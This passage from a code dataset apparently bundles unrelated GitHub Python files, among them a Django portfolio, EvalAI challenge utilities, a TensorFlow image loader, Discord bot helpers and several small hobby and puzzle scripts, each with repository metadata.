form.cleaned_data['telefone']\n assunto = form.cleaned_data['assunto']\n mensagem = form.cleaned_data['mensagem']\n contato = Contato(nome=nome, email=email, telefone=telefone, assunto=assunto, mensagem=mensagem)\n contato.save()\n\n return render(request, 'portfolio/contacto/contacto_sucesso.html')\n 
else:\n form = ContatoForm()\n\n return render(request, 'portfolio/contacto/contacto_full.html', {'form': form})\n\n\ndef contacto_sucesso(request):\n return render(request, 'portfolio/contacto/contacto_sucesso.html')\n\n\ndef login_contacto(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:contacto_full')\n else:\n # aqui\n return render(request, 'portfolio/contacto/contacto_login.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/contacto/contacto_login.html')\n\n\ndef logout_contacto(request):\n logout(request)\n return redirect('portifolio:contacto_full')\n\n\ndef contacto_todos_formularios(request):\n formularios = Contato.objects.all()\n context = {\n 'formularios': formularios\n }\n return render(request, 'portfolio/contacto/contacto_todos_formularios.html', context)\n\n\n# Projetos------------------------------------------------\ndef projetos_full(request):\n projetos = Projeto.objects.all()\n context = {\n 'projetos': projetos\n }\n return render(request, 'portfolio/projetos/projetos_full.html', context)\n\n\n@login_required\ndef criar_projeto(request):\n if request.method == 'POST':\n form = ProjetoForm(request.POST, request.FILES)\n if form.is_valid():\n projeto = form.save()\n return redirect('portifolio:detalhes_projeto', pk=projeto.pk)\n else:\n form = ProjetoForm()\n return render(request, 'portfolio/projetos/criar_projeto.html', {'form': form})\n\n\n@login_required\ndef editar_projeto(request, pk):\n projeto = get_object_or_404(Projeto, pk=pk)\n if request.method == 'POST':\n form = ProjetoForm(request.POST, instance=projeto)\n if form.is_valid():\n form.save()\n return redirect('portifolio:detalhes_projeto', pk=projeto.pk)\n else:\n form = ProjetoForm(instance=projeto)\n return render(request, 'portfolio/projetos/editar_projeto.html',\n {'form': form, 'projeto': projeto})\n\n\n@login_required\ndef apagar_projeto(request, pk):\n projeto = get_object_or_404(Projeto, pk=pk)\n if request.method == 'POST':\n projeto.delete()\n return redirect('portifolio:projetos_full')\n return render(request, 'portfolio/projetos/apagar_projeto.html',\n {'projeto': projeto})\n\n\ndef detalhes_projeto(request, pk):\n projeto = get_object_or_404(Projeto, pk=pk)\n return render(request, 'portfolio/projetos/detalhes_projeto.html',\n {'projeto': projeto})\n\n\ndef login_projeto(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:projetos_full')\n else:\n # aqui\n return render(request, 'portfolio/projetos/login_projeto.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/projetos/login_projeto.html')\n\n\ndef logout_projeto(request):\n logout(request)\n\n return redirect('portifolio:projetos_full')\n\n\n# Skills (Sobre mim)----------------------\ndef skills(request):\n return render(request, 'portfolio/sobreMim/sobreMim_skills_folder/sobreMim_skills.html')\n\n# Testes------------------------------\ndef defesa(request):\n praia = Praia.objects.all()\n if request.method == 'POST':\n form = PraiaForm(request.POST, request.FILES)\n if form.is_valid():\n projeto = form.save()\n return 
redirect('portifolio:defesa', pk=projeto.pk)\n else:\n form = ProjetoForm()\n\n return render(request, 'portfolio/defesa/defesa.html')\n\n\ndef testeNav(request):\n return render(request, 'portfolio/base/testeNav.html')\n","repo_name":"felipegsi/a22103965-django-portifolio","sub_path":"portifolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"21570115633","text":"from PyQt5.QtWidgets import (QHBoxLayout, QPushButton, QSizePolicy,\n\t\t\t\t\t\t\t QSpacerItem, QVBoxLayout, QWidget)\n\n\nclass FullWindowWidget(QWidget):\n\tdef __init__(self, parent, widget=None, layout=None):\n\t\tsuper().__init__()\n\t\tself.parent = parent\n\t\tself.main_window = parent.main_window\n\n\t\tif layout is None and widget is None:\n\t\t\traise Exception(\"Either layout or widget must be provided\")\n\n\t\tmain_layout = QVBoxLayout(self)\n\t\tmain_layout.setContentsMargins(0, 0, 0, 0)\n\t\tmain_layout.setSpacing(0)\n\n\t\t# Create header widget with close button\n\t\theader_widget = QWidget()\n\t\theader_layout = QHBoxLayout(header_widget)\n\t\theader_layout.setContentsMargins(4, 4, 4, 4)\n\n\t\tclose_button = QPushButton(\"Close\")\n\t\tclose_button.clicked.connect(self.destroy)\n\n\t\theader_layout.addItem(QSpacerItem(0, 0, QSizePolicy.Expanding, QSizePolicy.Minimum))\n\t\theader_layout.addWidget(close_button)\n\n\t\theader_widget.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)\n\t\tmain_layout.addWidget(header_widget)\n\n\t\t# Create body widget with the provided layout\n\t\tif widget is not None:\n\t\t\tmain_layout.addWidget(widget)\n\t\telse:\n\t\t\tbody_widget = QWidget()\n\t\t\tbody_widget.setLayout(layout)\n\t\t\tmain_layout.addWidget(body_widget)\n\n\tdef show(self):\n\t\tself.main_window.hide_main_layout()\n\t\tself.main_window.main_widget.setParent(None)\n\t\tself.main_window.setCentralWidget(self)\n\t\treturn\n\n\tdef destroy(self, *args, **kwargs):\n\t\tself.setParent(None)\n\t\tself.main_window.setCentralWidget(self.main_window.main_widget)\n\t\tself.main_window.show_main_layout()\n\t\treturn super().destroy(*args, **kwargs)\n","repo_name":"eimantaskat/minecraft-server-launcher","sub_path":"gui/widgets/full_window_widget.py","file_name":"full_window_widget.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"34416382876","text":"import json\nimport os\nimport sys\nimport zipfile\n\nfrom config import *\nfrom github import Github\n\n\ndef check_for_errors():\n \"\"\"\n Checks if any errors have been recorded so far during this workflow step and returns the error if so\n \"\"\"\n if os.getenv(\"CHALLENGE_ERRORS\") == \"False\":\n return True, None\n return False, os.getenv(\"CHALLENGE_ERRORS\")\n\n\ndef check_if_pull_request():\n \"\"\"\n Returns True if the workflow triggering event is a pull request\n \"\"\"\n if GITHUB_EVENT_NAME == \"pull_request\":\n return True\n return False\n\n\ndef check_if_merge_or_commit():\n \"\"\"\n Returns True if the workflow triggering event is either a merge or a direct commit\n \"\"\"\n if GITHUB_EVENT_NAME == \"push\":\n return True\n return False\n\n\ndef add_pull_request_comment(github_auth_token, repo_name, pr_number, comment_body):\n \"\"\"\n Adds a comment to a pull request\n Arguments:\n github_auth_token {str}: The auth token of the github user\n repo_name {str}: The name of the repository\n pr_number {int}: The 
Pull request number to add a comment\n comment_body {str}: The body of the comment\n \"\"\"\n try:\n client = Github(github_auth_token)\n repo = client.get_user().get_repo(repo_name)\n pull = repo.get_pull(pr_number)\n pull.create_issue_comment(comment_body)\n except Exception as e:\n print(\"There was an error while commenting on the Pull request: {}\".format(e))\n\n\ndef create_github_repository_issue(\n github_auth_token, repo_name, issue_title, issue_body\n):\n \"\"\"\n Creates an issue in a given repository\n \n Arguments:\n github_auth_token {str}: The auth token of the github user\n repo_name {str}: The name of the repository\n issue_title {int}: The title of the issue to be created\n issue_body {str}: The body of the issue to be created\n \"\"\"\n try:\n client = Github(github_auth_token)\n repo = client.get_user().get_repo(repo_name)\n issue = repo.create_issue(issue_title, issue_body)\n except Exception as e:\n print(\"There was an error while creating an issue: {}\".format(e))\n\n\ndef create_challenge_zip_file(challenge_zip_file_path, ignore_dirs, ignore_files):\n \"\"\"\n Creates the challenge zip file at a given path\n \n Arguments:\n challenge_zip_file_path {str}: The relative path of the created zip file\n ignore_dirs {list}: The list of directories to exclude from the zip file\n ignore_files {list}: The list of files to exclude from the zip file\n \"\"\"\n working_dir = (\n os.getcwd()\n ) # Special case for github. For local. use os.path.dirname(os.getcwd())\n\n # Creating evaluation_script.zip file\n eval_script_dir = working_dir + \"/evaluation_script\"\n eval_script_zip = zipfile.ZipFile(\n \"evaluation_script.zip\", \"w\", zipfile.ZIP_DEFLATED\n )\n for root, dirs, files in os.walk(eval_script_dir):\n for file in files:\n file_name = os.path.join(root, file)\n name_in_zip_file = (\n file_name[len(eval_script_dir) + 1 :]\n if file_name.startswith(eval_script_dir)\n else file_name\n )\n eval_script_zip.write(file_name, name_in_zip_file)\n eval_script_zip.close()\n\n # Creating the challenge_config.zip file\n zipf = zipfile.ZipFile(challenge_zip_file_path, \"w\", zipfile.ZIP_DEFLATED)\n for root, dirs, files in os.walk(working_dir):\n parents = root.split(\"/\")\n if not set(parents) & set(ignore_dirs):\n for file in files:\n if file not in ignore_files:\n file_name = os.path.join(root, file)\n name_in_zip_file = (\n file_name[len(working_dir) + 1 :]\n if file_name.startswith(working_dir)\n else file_name\n )\n zipf.write(file_name, name_in_zip_file)\n zipf.close()\n\n\ndef get_request_header(token):\n \"\"\"\n Returns user auth token formatted in header for sending requests\n \n Arguments:\n token {str}: The user token to gain access to EvalAI\n \"\"\"\n header = {\"Authorization\": \"Bearer {}\".format(token)}\n return header\n\n\ndef load_host_configs(config_path):\n \"\"\"\n Loads token to be used for sending requests\n \n Arguments:\n config_path {str}: The path of host configs having the user token, team id and the EvalAI host url\n \"\"\"\n config_path = \"{}/{}\".format(os.getcwd(), config_path)\n if os.path.exists(config_path):\n with open(config_path, \"r\") as f:\n try:\n data = f.read()\n except (OSError, IOError) as e:\n print(\"\\nAn error occured while loading the host configs: {}\".format(e))\n sys.exit(1)\n data = json.loads(data)\n host_auth_token = data[\"token\"]\n challenge_host_team_pk = data[\"team_pk\"]\n evalai_host_url = data[\"evalai_host_url\"]\n return [host_auth_token, challenge_host_team_pk, evalai_host_url]\n else:\n error_message = 
\"\\nThe host config json file is not present. Please include an auth token, team_pk & evalai_host_url in it: {}\".format(\n config_path\n )\n print(error_message)\n os.environ[\"CHALLENGE_ERRORS\"] = error_message\n return False\n\n\ndef validate_token(response):\n \"\"\"\n Function to check if the authentication token provided by user is valid or not\n \n Arguments:\n response {dict}: The response json dict sent back from EvalAI \n \"\"\"\n error = None\n if \"detail\" in response:\n if response[\"detail\"] == \"Invalid token\":\n error = \"\\nThe authentication token you are using isn't valid. Please generate it again.\\n\"\n print(error)\n os.environ[\"CHALLENGE_ERRORS\"] = error\n return False\n if response[\"detail\"] == \"Token has expired\":\n error = \"\\nSorry, the token has expired. Please generate it again.\\n\"\n print(error)\n os.environ[\"CHALLENGE_ERRORS\"] = error\n return False\n return True\n","repo_name":"Cloud-CV/EvalAI-Starters","sub_path":"github/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"42"} +{"seq_id":"7436624411","text":"#!/usr/bin/env python3\n\n\nps = [2, 3, 5, 7, 11, 13, 17]\n\n\ndef hasprop(n):\n for k in range(7):\n sl = int(str(n)[k + 1 : k + 4])\n if sl % ps[k]:\n return False\n\n return True\n\n\nsum = 0\n\n\ndef check(l):\n global sum\n n = int(''.join([str(k) for k in l]))\n if hasprop(n):\n print(n)\n sum += n\n\n\ndef forperm(l, f, t=[]):\n if l:\n for i in range(len(l)):\n p = t[:]\n p.append(l[i])\n l2 = l[:]\n del l2[i]\n forperm(l2, f, p)\n else:\n f(t)\n\n\nl = list(range(0, 10))\nforperm(l, check)\n\nprint(sum)\n","repo_name":"labuwx/progpuzzles","sub_path":"project_euler/pe43.py","file_name":"pe43.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"19145661755","text":"class BankAccount():\n\n def __init__(self, iban, acc_no, funds, recent_trans):\n self.iban = iban\n self.acc_no = acc_no\n self.funds = funds\n self.recent_trans = recent_trans\n\n def deposit(self):\n amount = float(input(\"Enter an amount to be deposited: \"))\n self.avail_funds += amount\n # if len(self.recent_trans) < 5:\n # self.recent_trans.pop(0)\n print(\"Amount deposited: \", amount)\n\n def withdraw(self):\n amount = float(input(\"Enter an amount to be withdrawn: \"))\n if self.avail_funds >= amount:\n self.avail_funds -= amount\n print(\"Amount withdrawn: \", amount)\n else:\n print(\"Insufficient Funds\")\n\n def display(self):\n print(\"Account Number:\", self.iban)\n print(\"Available Balance = \",self.avail_funds)\n\n\ns = BankAccount(\"IE64IRCE92050112345678\", \"2275409\", 1000, [])\n\ns.deposit()\ns.withdraw()\ns.display()\n","repo_name":"BearachB/Hello_World","sub_path":"Week 9/Lab 16 - Classes/lab16_q3b.py","file_name":"lab16_q3b.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"20404382610","text":"import cv2\nimport numpy as np\nfrom skimage import io, img_as_ubyte\nfrom skimage.transform import rotate, AffineTransform, warp\nfrom skimage.util import random_noise\nimport random\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom skimage.exposure import rescale_intensity\nfrom skimage.segmentation import slic\nfrom skimage.util import img_as_float\nimport random\nimport csv\nimport xml.etree.ElementTree as ET\n\n\nif 
os.path.isdir('foto_simulador') == False:\n print('A pasta \"foto_simulador\" não existe. Criando diretório.')\nelse:\n print('A pasta \"foto_simulador\" existe.')\n images_path = os.getcwd() + '\\\\foto_simulador'\n\nif os.path.isdir('Aumented_Images') == False:\n print('A pasta \"Aumented_Images\" não existe. Criando diretório.')\n os.mkdir('Aumented_Images')\nelse:\n print('A pasta \"Aumented_Images\" existe.')\n augmented_path = os.getcwd() + '\\\\Aumented_Images'\n\nimages = []\nfor im in os.listdir(images_path):\n images.append(os.path.join(images_path, im))\nimages_to_generate = 80 # qtd de imagens que vai gerar\ni = 0 # variavel para inteirar no images_to_generate\n\n\ndef minmax(img2):\n # Create a black image\n #img = np.zeros((200,300,3), np.uint8)\n #cv2.rectangle(img,(xmin,ymin),(xmax,ymax),(255,255,255),-1)\n \n #MUDANCAS\n\n # Find Canny edges \n edged = cv2.Canny(img2, 200, 200) \n #cv2.imshow('img2', edged)\n #cv2.waitKey(0) \n \n # Finding Contours \n contours, hierarchy = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) \n \n for contour in contours:\n (x,y,w,h) = cv2.boundingRect(contour)\n #print(\"find\")\n #print(str(x) +'-'+str(y) +'-'+str(w+x) +'-'+str(y+h) )\n\n #print(\"Number of Contours found = \" + str((contours))) \n cf = contours\n # Draw all contours \n # -1 signifies drawing all contours \n #cv2.drawContours(img2, contours, -1, (0, 255, 0), 3) \n if (cf == []):\n x = 0\n y = 0\n w = 0\n h = 0\n\n #cv2.imshow('img2', img2)\n\n #cv2.waitKey(0) \n return(x, y, w+x, y+h)\n\n\ndef rotacao(image):\n # points for test.jpg\n cnt = np.array([\n [[350, 250]],\n [[200, 600]],\n [[400, 550]],\n [[660, 500]]\n ])\n \n rect = cv2.minAreaRect(cnt)\n \n\n # the order of the box points: bottom left, top left, top right,\n # bottom right\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n # get width and height of the detected rectangle\n width = int(rect[1][0])\n height = int(rect[1][1])\n\n src_pts = box.astype(\"float32\")\n # coordinate of the points in box points after the rectangle has been\n # straightened\n dst_pts = np.array([[0, height-1],\n [0, 0],\n [width-1, 0],\n [width-1, height-1]], dtype=\"float32\")\n\n # the perspective transformation matrix\n M = cv2.getPerspectiveTransform(src_pts, dst_pts)\n\n # directly warp the rotated rectangle to get the straightened rectangle\n warped = cv2.warpPerspective(image, M, (width, height))\n\n return warped\n \n\ndef hrz_vira(image):\n\n#Função responsável por fazer a inversão horizontal da imagem.\n#Entrada: Imagem\n#Saída: Imagem invertida no sentido horizontal\n\n return np.fliplr(image)\n\ndef vtc_vira(image):\n\n#Função responsável por fazer a inversão vertical da imagem.\n#Entrada: Imagem\n#Saída: Imagem invertida no sentido vertical\n\n return np.flipud(image)\n\ndef ruidos_img(image):\n\n#Função responsável por inserir ruídos randomincos do tipo sal e pimenta na imagem.\n#Entrada: Imagem\n#Saída: Imagem com ruidos do tipo sal e pimenta\n\n #return random_noise(image)\n row,col,ch = image.shape\n s_vs_p = 0.5\n amount = 0.05\n out = np.copy(image)\n # Salt mode\n num_salt = np.ceil(amount * image.size * s_vs_p)\n coords = [np.random.randint(0, i - 1, int(num_salt))\n for i in image.shape]\n out[coords] = 1\n\n # Pepper mode\n num_pepper = np.ceil(amount* image.size * (1. 
- s_vs_p))\n coords = [np.random.randint(0, i - 1, int(num_pepper))\n for i in image.shape]\n out[coords] = 0\n #cv2.imshow('blabs', out)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n return out\n\ndef brilhoo(image):\n\n#Função responsável por incrementar brilho a imagem.\n#Entrada: Imagem\n#Saída: Imagem com brilho\n\n brilhin = np.ones(image.shape, dtype=\"uint8\") * 70\n aumentabrilho = cv2.add(image, brilhin)\n return aumentabrilho\n\ndef blur_img(image):\n\n#Função responsável por aplicar um filtro mediana na imagem.\n#Entrada: Imagem\n#Saída: Imagem com filtro mediana\n\n k_size = random.randrange(1,10,2)\n img_blur = cv2.medianBlur(image, k_size)\n return img_blur\n\ndef zoom(image):\n\n#Função responsável por aplicar zoom na imagem.\n#Entrada: Imagem\n#Saída: Imagem com zoom\n\n zoom_value = random.random()\n hidth, width = image.shape[:2]\n h_taken = int(zoom_value*hidth)\n w_taken = int(zoom_value*width)\n h_start = random.randint(0, hidth-h_taken)\n w_start = random.randint(0, width-w_taken)\n image = image[h_start:h_start+h_taken, w_start:w_start+w_taken, :]\n image = cv2.resize(image, (hidth, width), cv2.INTER_CUBIC)\n return image\n\n# Dicionario para ativar as funcoes\ntransformations = {'Rotacao': rotacao,\n 'Horizontal flip': hrz_vira,\n 'Vertical flip': vtc_vira,\n 'Ruidos': ruidos_img,\n 'Brilho': brilhoo,\n 'Blur Image': blur_img,\n 'Zoom': zoom\n }\n\n\n\ndata = []\nwhile i < images_to_generate:\n x = random.randrange(146)\n\n arquivo = ET.parse(images[1])\n\n if x == 0:\n x = x + 1\n arquivo = ET.parse(images[x])\n if x % 2 != 0:\n arquivo = ET.parse(images[x])\n else:\n x = x + 1\n arquivo = ET.parse(images[x])\n\n print (x)\n bla = arquivo.getroot()\n\n numeros = bla.findall(\"object/bndbox\")\n xmin = 0\n ymin = 0\n xmax = 0\n ymax = 0\n\n for item in numeros:\n xmin = int(item.find(\"xmin\").text)\n ymin = int(item.find(\"ymin\").text)\n xmax = int(item.find(\"xmax\").text)\n ymax = int(item.find(\"ymax\").text)\n \n\n print(xmin, ymin, xmax, ymax)\n\n image = images[x - 1]\n original_image = io.imread(image)\n transformed_image = []\n n = 0 # variável para iterar até o número de transformação\n\n height, width, channels = original_image.shape\n # imagemm - cria uma img preta com um bounding no lugar q deveria estar na imagem da pista\n imagemm = np.zeros((height,width,channels), np.uint8)\n cv2.rectangle(imagemm,(xmin,ymin),(xmax,ymax),(255,255,255),-1)\n\n #cv2.imshow('img1', imagemm)\n #cv2.waitKey(0)\n# escolha um número aleatório de transformação para aplicar na imagem\n transformation_count = random.randint(1, len(transformations))\n \n while n <= transformation_count:\n # Escolha aleatorio do metodo a ser aplicado\n key = random.choice(list(transformations))\n print(key)\n transformed_image = transformations[key](original_image)\n #print(transformed_image.dtype)\n # faz as mesmas transformacoes na imagem preta\n img2 = transformations[key](imagemm)\n\n # mean normalization\n image = transformed_image.astype(np.float32) / 255\n image -= image.mean()\n image /= image.std()\n transformed_image = transformed_image.astype(np.uint8)\n transformed_image = np.round(transformed_image).astype(np.uint8)\n\n n += 1\n \n\n #cv2.imshow('blabs', transformed_image)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n \n\n nome = \"augmented_image_%s.jpg\" % (i)\n new_image_path = \"%s/augmented_image_%s.jpg\" % (augmented_path, i)\n # Converta uma imagem para o formato de byte sem sinal, com valores em [0, 255].\n transformed_image = img_as_ubyte(transformed_image)\n img2 = 
img_as_ubyte(img2)\n #cv2.imshow('blabs', transformed_image)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n\n # converter a imagem antes de gravar\n transformed_image = cv2.cvtColor(transformed_image, cv2.COLOR_BGR2RGB)\n img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)\n #cv2.imshow('blabs', transformed_image)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n \n \n # Salvar a imagem ja convertida\n cv2.imwrite(new_image_path, transformed_image)\n i = i+1\n height, width, channels = transformed_image.shape\n\n # chama a funcao que vai retornar o x & y min e max do bounding\n xmin, ymin, xmax, ymax = minmax(img2)\n \n # elemento da lista data[] que armazena as informacoes da imagem transformada\n tentativa = (nome, height, width, 'pista', xmin, ymin, xmax, ymax)\n \n #acrescenta \"tentativa\" a lista data[] (cada imagem gera uma tentativa diferente q e acrescido a data)\n data.append(tentativa)\n\n #cv2.imshow('img2', img2)\n #cv2.waitKey(0) \n\n# cria o documento csv que armazena os dados por imagem\nwith open('teste.csv', \"w\", newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"filename\", \"width\", \"height\", \"class\", \"xmin\", \"ymin\", \"xmax\", \"ymax\"])\n writer.writerows(data) \n","repo_name":"gmiserani/aumented_Images","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":9173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29811237416","text":"# a simple parser for python. use get_number() and get_word() to read\ndef parser():\n while 1:\n data = list(input().split(' '))\n for number in data:\n if len(number) > 0:\n yield(number) \n\ninput_parser = parser()\n\ndef get_word():\n global input_parser\n return next(input_parser)\n\ndef get_number():\n data = get_word()\n try:\n return int(data)\n except ValueError:\n return float(data)\n\n# numpy and scipy are available for use\n\ndef is_possible(arr, n, m, curr_min):\n\tstudentsrequired = 1\n\tcurr_sum = 0\n\tfor i in range(n):\n\t\tif (arr[i] > curr_min):\n\t\t\treturn False\n\t\tif (curr_sum + arr[i] > curr_min):\n\t\t\tstudentsrequired += 1\n\t\t\tcurr_sum = arr[i]\n\t\t\tif (studentsrequired > m):\n\t\t\t\treturn False\n\t\telse:\n\t\t\tcurr_sum += arr[i]\n\treturn True\ndef findpages(arr, n, m):\n\tsum1 = 0\n\tif (n < m):\n\t\treturn -1\n\tfor i in range(n):\n\t\tsum1 += arr[i]\n\tstart, end = 0, sum1\n\tresult = 10**9\n\twhile (start <= end):\n\t\tmid = (start + end) // 2\n\t\tif (is_possible(arr, n, m, mid)):\n\t\t\tresult = mid\n\t\t\tend = mid - 1\n\t\telse:\n\t\t\tstart = mid + 1\n\treturn result\nn,m = map(int, input().split())\narr = []\nfor i in range(n):\n arr.append(2**get_number())\nprint(findpages(arr, n, m))","repo_name":"ashish159565/PYTHON","sub_path":"IEEE Extreme/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"41802052254","text":"import requests\nimport time\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\ntime_now = time.localtime(time.time())\nH = int(time_now.tm_hour)\nurl_code = input()\n\nwhile True :\n if(H == 16):\n url = \"https://finance.naver.com/item/main.nhn?code=\" + url_code\n result = requests.get(url)\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"}) # 태그 p, 속성값 no_today 찾기\n 0\n now_price = no_today.text\n \n print(now_price)\n print(today_)\n f = 
open(\"주식가격.txt\",\"w+\")\n f.write(\"\\n\")\n f.write(today_)\n f.write(\"\\n\")\n f.write(now_price)\n f.close()\n \n \n\n","repo_name":"WhiteHerb/stockdata","sub_path":"주식_2-test.py","file_name":"주식_2-test.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"28425101931","text":"number = int(input(\"What number: \"))\n\n#construct spiral\nspiral = []\nspiral.append([1])\n\nring_lev = 1\nnum = 2\nwhile num <= number:\n ring = []\n while len(ring) < ring_lev * 8:\n ring.append(num)\n num += 1\n ring_lev += 1\n spiral.append(ring)\n\ndef Manhat_Dis(a):\n for i in a:\n if number in i:\n x = a.index(i)\n y = i.index(number)+1\n\n return x + abs((x) - ((y) % (x*2))) \n\nprint(Manhat_Dis(spiral))\n","repo_name":"MxMossy/aoc2017","sub_path":"3_day.py","file_name":"3_day.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"4428187668","text":"#coding:utf-8\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\ndef get_files(file_dir):\n image = []\n label = []\n if not os.path.exists(file_dir):\n print(\"{} is not exits.\".format(file_dir))\n exit()\n file = open(file_dir,'r')\n root = 'C:/Users/zanghao/Desktop/公司/yi/In-shop_Clothes_Retrieval_Benchmark/img/'\n for line in file:\n temp = line.strip('\\n').split()\n image.append(root+temp[0])\n label.append(temp[1])\n temp = np.array([image,label])\n temp = temp.transpose()\n np.random.shuffle(temp)\n image_list = list(temp[:,0])\n label_list = list(temp[:,1])\n #label_list = [int(i.split('0')[]) for i in label_list]\n return image_list,label_list\n\ndef get_batch(image,label,image_W,image_H,batch_size,capacity):\n\n image = tf.cast(image,tf.string)\n label = tf.cast(label,tf.string)\n #generate input queue\n input_queue = tf.train.slice_input_producer([image,label])\n label = input_queue[1]\n image_contents = tf.read_file(input_queue[0])\n image = tf.image.decode_jpeg(image_contents,channels=3)\n image = tf.image.resize_image_with_crop_or_pad(image,image_W,image_H)\n image = tf.image.per_image_standardization(image)\n image_batch,label_batch = tf.train.batch([image,label],\n batch_size=batch_size,\n num_threads=32,\n capacity=capacity)\n label_batch = tf.reshape(label_batch,[batch_size])\n image_batch = tf.cast(image_batch,tf.float32)\n\n return image_batch,label_batch\n\ndef build_input():\n BATCH_SIZE = 1\n CAPACITY = 256\n IMG_W = 256\n IMG_H = 256\n file_dir = 'C:/Users/zanghao/Desktop/公司/yi/In-shop_Clothes_Retrieval_Benchmark/Eval/train.txt'\n image_list, label_list = get_files(file_dir)\n image_batch, label_batch = get_batch(image_list,label_list,IMG_W,IMG_H,BATCH_SIZE,CAPACITY)\n label_batch = tf.zeros([BATCH_SIZE, 1])\n return image_batch,label_batch\n\n\ndef main():\n BATCH_SIZE = 2\n CAPACITY = 256\n IMG_W = 256\n IMG_H = 256\n file_dir = 'C:/Users/zanghao/Desktop/公司/yi/In-shop_Clothes_Retrieval_Benchmark/Eval/train.txt'\n image_list, label_list = get_files(file_dir)\n image_batch, label_batch = get_batch(image_list,label_list,IMG_W,IMG_H,BATCH_SIZE,CAPACITY)\n with tf.Session() as sess:\n i = 0\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n try:\n while not coord.should_stop() and i<2:\n img,label = sess.run([image_batch,label_batch])\n for j in np.arange(BATCH_SIZE):\n print('label: %s' %label[i])\n plt.imshow(img[j,:,:,:])\n plt.show()\n i+=1\n except 
tf.errors.OutOfRangeError:\n print ('done')\n finally:\n coord.request_stop()\n coord.join(threads)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ZBYuan0813/tensorflow-train-resnet","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40147330968","text":"import json\r\nimport discord\r\nimport os\r\nimport csv\r\n\r\n#Check if the user is an administrator.\r\nasync def checkAdmin(person):\r\n for r in person.roles:\r\n if r.permissions.administrator:\r\n return True\r\n return False\r\n\r\n#Checks if a specific user has a role.\r\nasync def checkRole(person, role):\r\n if role == \"everyone\":\r\n return True\r\n\r\n for r in person.roles:\r\n if r.name == role:\r\n return True\r\n return False\r\n\r\n#Load a JSON file.\r\nasync def loadJSON(location):\r\n with open(location, 'rt') as f:\r\n configData = json.load(f)\r\n f.close()\r\n return configData\r\n\r\n#Overwrite a JSON file.\r\nasync def overwriteJSON(location, newConfig):\r\n os.remove(location)\r\n with open(location, 'w') as f:\r\n json.dump(newConfig, f)\r\n f.close()\r\n\r\n#Load a CSV file.\r\nasync def loadCSV(location):\r\n with open(location, 'rt') as f:\r\n donateData = csv.reader(f)\r\n return reversed(list(donateData))\r\n\r\n#Get a users specific role.\r\nasync def getRole(client, message, roleName):\r\n for server in client.servers:\r\n if server == message.server:\r\n for role in server.roles:\r\n if roleName == role.name:\r\n return role\r\n return 0\r\n\r\n#Create a role.\r\nasync def createRole(client, message, rolename):\r\n for server in client.servers:\r\n if server == message.server:\r\n numRoles = len(server.roles)\r\n\r\n newRole = await client.create_role(message.server, permissions=discord.Permissions.none(), name=rolename)\r\n await client.move_role(message.server, newRole, numRoles)\r\n return newRole\r\n","repo_name":"ShaneNolan/Black-Bot","sub_path":"library/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10246587634","text":"import time, os\n\nfrom discord.ext import commands\nimport discord\n\nfrom Helper import Helper\n\nimport asyncio\nimport requests\ntry:\n from decouple import config\n voicerssKey = config('voice')\n ibmkey = config('ibmkey')\n\nexcept ImportError:\n voicerssKey = os.environ['voice']\n ibmkey = os.environ['ibmkey']\n\n\nvoicesString = \"Dinis\\nMarcia\\nLigia\\nYara\\nLeonor\\nIsabela\"\n\ndef getVoice(output, voz=\"Isabela\"):\n if voz == \"Isabela\":\n from ibm_watson import TextToSpeechV1\n from 